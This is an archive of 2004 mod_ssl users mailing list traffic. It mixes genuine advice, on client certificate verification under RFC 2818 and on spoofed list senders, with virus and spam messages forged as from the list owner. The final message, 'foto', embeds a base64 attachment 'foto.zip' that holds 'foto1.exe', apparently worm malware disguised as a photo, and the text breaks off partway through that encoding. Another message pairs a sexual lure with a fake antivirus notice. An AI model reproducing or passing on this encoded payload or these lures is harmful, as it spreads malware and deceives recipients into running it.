Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (cable6-118.murray-ky.net [63.151.141.118])
	by master.modssl.org (Postfix) with SMTP id EFD02A895E
	for ; Sat, 28 Aug 2004 02:55:07 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: FW:RE: Least *21* Years
Date: 28 Feb 2004 03:55:38 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040828005507.EFD02A895E@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Cum and check this fun group out...Sexy ladies!! Come post your ad,..this is a real swingers group!! I'm attatching a Video Clip of my wife if interested in checking it out!
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug 29 13:34:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 31A80A8982; Sun, 29 Aug 2004 13:34:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta206-rme.xtra.co.nz (mta206-rme.xtra.co.nz [210.86.15.58])
	by master.modssl.org (Postfix) with ESMTP id E4A7EA8976
	for ; Sun, 29 Aug 2004 13:34:51 +0200 (CEST)
Received: from mta1-rme.xtra.co.nz ([210.86.15.140])
          by mta206-rme.xtra.co.nz with ESMTP
          id <20040829113427.NPGQ25634.mta206-rme.xtra.co.nz@mta1-rme.xtra.co.nz>
          for ; Sun, 29 Aug 2004 23:34:27 +1200
Received: from kanga.cyberdyne.co.mars ([210.86.98.90])
          by mta1-rme.xtra.co.nz with SMTP
          id <20040829113426.QLEO21194.mta1-rme.xtra.co.nz@kanga.cyberdyne.co.mars>
          for ; Sun, 29 Aug 2004 23:34:26 +1200
Received: (qmail 56852 invoked from network); 29 Aug 2004 11:34:26 -0000
Received: from tigger.cyberdyne.co.mars (HELO xtra.co.nz) (10.146.171.54)
  by 0 with SMTP; 29 Aug 2004 11:34:26 -0000
Message-ID: <4131BF42.2050005@xtra.co.nz>
Date: Sun, 29 Aug 2004 23:34:26 +1200
From: James Collier 
Organization: Cyberdyne Systems Ltd.
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040622
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: server verification of client FQDNs
References: <20040819233709.08B9C8402@qworks.ca>
In-Reply-To: <20040819233709.08B9C8402@qworks.ca>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Alex Milanovic wrote:
> Hi All,
> 
>  
> 
> I want to configure Apache to verify client certificates. What I am not sure
> about is whether Apache verifies the fully qualified domain name (FQDN) of
> each client as well. If it does, where is this behavior explained? For
> example, does it use the client IP address to look up the corresponding
> domain names in the DNS and then compare all matching domain names to the
> one in the client certificate? Also, which field is used in the client
> certificate, subjectName.commonName or subjectAltName.dNSName? What happens
> if the names don't match? What if the DNS lookup fails because there is no
> DNS entry for the given IP?
> 
>  
> 
> Thanks,
> 
> Alex
> 
> 

I see no-one else has answered this so ... in short, Alex, https/TLS 
servers aren't supposed to validate client IP addresses or domain names.

A server certificate for https/TLS binds a domain name to a key pair, 
and client software is required to verify the correspondence of the 
requested domain name in the URL and in the server certificate. In a 
server certificate the subjectAltName.dNSName - or traditionally the CN 
component of the distinguished name - is the server's FQDN.

General X.509 certificates, however, bind *arbitrary* information and 
identities - not usually domain names - to the keypair; any valid 
certificate can be used as a client certificate and usually there will 
be no domain-related information in the certificate at all.

So, for example, my company-issued certificate binds my corporate 
identity ...

   DN=(CN="Jmaes Colier",O="Vogon Enterprises Inc.",OU="Janitors", ...)

... to a private key that is accessible to my laptop's browser. This 
means I can authenticate myself to my company's intranet no matter 
where/how my laptop is connected to the Internet (home, airport, hotel, 
random hotspot ...).

The verification of TLS certificates under https is governed by RFC 2818 
- worth reading for clarification - and as far as I can see there is no 
expectation that a server should ever attempt to verify a 
subjectAltName.dNSName in a client certificate against a DNS reverse lookup.

That said, there is nothing to stop you from doing this kind of 
verification in a closed community where you issue all certificates (you 
could probably hack it with mod_rewrite), but you would need to consider 
carefully whether or not it is a sensible or useful thing to do.

Regards -- James.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 30 09:48:37 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E2850A8A55; Mon, 30 Aug 2004 09:48:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 282E1A89A3
	for ; Mon, 30 Aug 2004 09:48:35 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id i7U7mLAG021057;
	Mon, 30 Aug 2004 09:48:21 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i7U7mK07026131;
	Mon, 30 Aug 2004 09:48:20 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: 1
Date: Mon, 30 Aug 2004 09:48:20 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: 1
thread-index: AcSMUqQl+7JzkS76TgqWCPpr7E+WWACEgV+A
From: "Boyle Owen" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



> -----Original Message-----
> From: Barry Smoke [mailto:barry@arhosting.com]
> Sent: Freitag, 27. August 2004 17:25
> To: modssl-users@modssl.org
> Subject: Re: 1
> 
> 
> these e-mails look strange,
> virus?

Of course.

The spammer is submitting the mails to mail.modssl.org with the "From"
field spoofed to "rse@engelschall.com". I guess the mailer will have to
start doing a reverse DNS lookup to verify that incoming mails are
really coming from the address they say they are..

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sgtulmg01.sabre.com (sgtulmg01.sabre.com
[151.193.220.17])
	by master.modssl.org (Postfix) with ESMTP id CD65CA8938
	for ; Fri, 27 Aug 2004 18:02:42 +0200
(CEST)
Received: from unknown (HELO SGNSOLO19151501.com) (10.16.131.25)
  by sgtulmg01.sabre.com with SMTP; 27 Aug 2004 10:56:31 -0500
X-Ironport-AV: i="3.84,116,1091422800"; 
   d="scan'217,208?gif'217,208"; a="219635635:sNHT279802964"
Date: Fri, 27 Aug 2004 10:57:36 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: 1
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------eoxkvqogjlpnqfooepkr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users
X-Mlf-Reason: no-judgement
Return-Path: owner-mmx-modssl-users@mmx.engelschall.com
X-OriginalArrivalTime: 27 Aug 2004 16:04:29.0243 (UTC)
FILETIME=[886DF8B0:01C48C4F]

----------eoxkvqogjlpnqfooepkr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

----------eoxkvqogjlpnqfooepkr
Content-Type: application/octet-stream; name="1.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.gif"


----------eoxkvqogjlpnqfooepkr--sxibm 

> 
> Rse wrote:
> 
> >
> >
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 30 14:16:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 294C7A8CCE; Mon, 30 Aug 2004 14:16:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from campbus.com (campbus.com [67.17.200.146])
	by master.modssl.org (Postfix) with ESMTP id 24E78A893D
	for ; Mon, 30 Aug 2004 14:15:55 +0200 (CEST)
Received: from [192.168.1.13] (cbs2.campbus.com [192.168.1.13])
	by campbus.com (8.12.10/8.12.4) with ESMTP id i7UCQUnv025690
	for ; Mon, 30 Aug 2004 08:26:31 -0400
Message-ID: <41331939.9050900@campney.net>
Date: Mon, 30 Aug 2004 08:10:33 -0400
From: Ken Campney 
User-Agent: Mozilla Thunderbird 0.7.3 (Windows/20040803)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1
References: 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Campney 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>
>
>The spammer is submitting the mails to mail.modssl.org with the "From"
>field spoofed to "rse@engelschall.com". I guess the mailer will have to
>start doing a reverse DNS lookup to verify that incoming mails are
>really coming from the address they say they are..
>
>  
>
You'd think they'd be looking into fixing this problem. While reverse 
DNS will solve this problem
it will also surely cause problems with legitimate email from domains 
hosting self DNS w/o properly setting up their reverse.

:(   I've been trying to get off this list for months due to list issues 
unsuccessfully I might add
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 20:07:43 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C533FA8D04; Tue, 31 Aug 2004 20:07:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.com (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 0E71DA8A81
	for ; Tue, 31 Aug 2004 20:07:37 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:08:30 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------boclqmsefvcqtnfycxcb"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------boclqmsefvcqtnfycxcb
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------boclqmsefvcqtnfycxcb
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
